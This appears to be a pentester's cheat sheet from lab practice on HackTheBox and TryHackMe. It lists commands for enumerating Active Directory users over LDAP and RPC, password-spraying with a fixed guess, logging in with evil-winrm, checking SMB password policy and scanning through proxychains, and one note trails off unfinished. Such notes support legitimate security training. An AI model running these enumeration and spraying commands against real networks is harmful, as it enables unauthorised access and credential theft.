DNS
dir \\za.tryhackme.com\SYSVOL
To try to leak dns info:
Powershell DNS config:
$dnsip = "<DC IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
LDAP(389)
ldapsearch -x -H ldap://<ip> -s base namingcontexts
Then use -b to select and then filter,etc ..
Ex:
ldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161 'objectClass=Person' sAMAccountName
To use kerberos authentication:
ldapsearch -H ldap://dc.absolute.htb -s base -Y GSSAPI -b "cn=users,dc=absolute,dc=htb" "user" "description"
To get list of users:
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
EXAMPLES:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -D 'ldap@support.htb' -w 'password' -b "DC=support,DC=htb" -H ldap://support.htb
RPC
rpcclient -U '' -N <ip>
Then can do multiple commands:
If valid users list is present use this to password spray:
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
WinRM(5985)
evil-winrm -u user -p password -i <ip>
SMB(445,139)
CrackMapExec
To check password policy(from kali):
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
To get TGT hashes for users with
For enumeration as it handles proxied traffic better:
proxychains nmap -n -Pn -F -sV -sT -oA nmap_results -vvv -iL ${target or targets.txt} -T4 --max-retries 1 --max-rtt-timeout 2s --ttl 50ms --open
To use kerberos authentication
KRB5CCNAME=svc_smb.ccache ./smbclient.py -k absolute.htb/svc_smb@dc.absolute.htb -target-ip 10.10.11.181